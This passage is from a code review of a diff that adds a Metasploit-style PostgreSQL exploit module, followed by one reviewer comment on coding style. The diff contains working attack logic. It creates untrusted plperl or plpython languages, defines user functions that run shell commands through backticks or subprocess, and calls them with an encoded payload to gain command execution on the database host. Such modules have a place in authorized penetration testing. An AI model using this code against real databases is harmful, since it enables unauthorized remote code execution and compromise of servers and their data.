modules/exploits/multi/postgres/postgres_createlang.rb

```diff
@@ -0,0 +1,274 @@
+          loaded = true
+
+        when 'not_exists'
+          print_status "#{human_language} could not be loaded"
+
+        else
+          print_error 'No exploit path found'
+          return false
+        end
+
+        break if loaded
+      end
+
+      if loaded
+        # Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say
+        # "NoMethodError undefined method `+' for nil:NilClass"
+        # But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal
+        select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
+
+        case select_query.keys[0]
+        when :conn_error
+          print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+
+        when :sql_error
+          print_error "Exploit failed"
+          return false
+
+        when :complete
+          print_good 'Starting payload'
+        end
+
+      else
+        return false
+      end
+
+    rescue RuntimeError => e
+      print_error "Failed to create UDF: #{e.class}: #{e}"
+    end
+
+    postgres_logout if @postgres_conn
+  end
+
+  def create_function(language, func_name)
+    load_func = ''
+
+    case language
+    when 'perl'
+      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \
+        "`$_[0]`;" \
+        "$$ LANGUAGE pl#{language}u")
+
+    # Ruby doesn't do case folding ... :/
+    when 'python'
+      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
+        "import subprocess, shlex\r" \
+        "subprocess.check_output(shlex.split(c))\r" \
+        "$$ LANGUAGE pl#{language}u")
+
+    when 'python2'
+      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
+        "import subprocess, shlex\r" \
+        "subprocess.check_output(shlex.split(c))\r" \
+        "$$ LANGUAGE pl#{language}u")
+
+    when 'python3'
+      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
+        "import subprocess, shlex\r" \
+        "subprocess.check_output(shlex.split(c))\r" \
+        "$$ LANGUAGE pl#{language}u")
+
+    else
+      print_error 'Invalid language'
+    end
+
+    case load_func.keys[0]
+    when :conn_error
+      print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+
+    when :sql_error
+      print_error "#{rhost}:#{rport} Exploit failed"
+      return false
+
+    when :complete
+      print_good 'Loaded UDF'
+    end
+  end
+
+  def create_language(language, extension)
+    load_language = postgres_query("CREATE #{extension} pl#{language}u")
+
+    if load_language.keys[0] == :sql_error
+      match_exists = load_language[:sql_error].match(/language "pl#{language}u" already exists/m)
+
+      if match_exists
+        return 'exists'
```

Comment:
Minor, but for keeping your style consistent, you could/should covert these to symbols and update the location where you are using the result of `create_language` to handle symbols.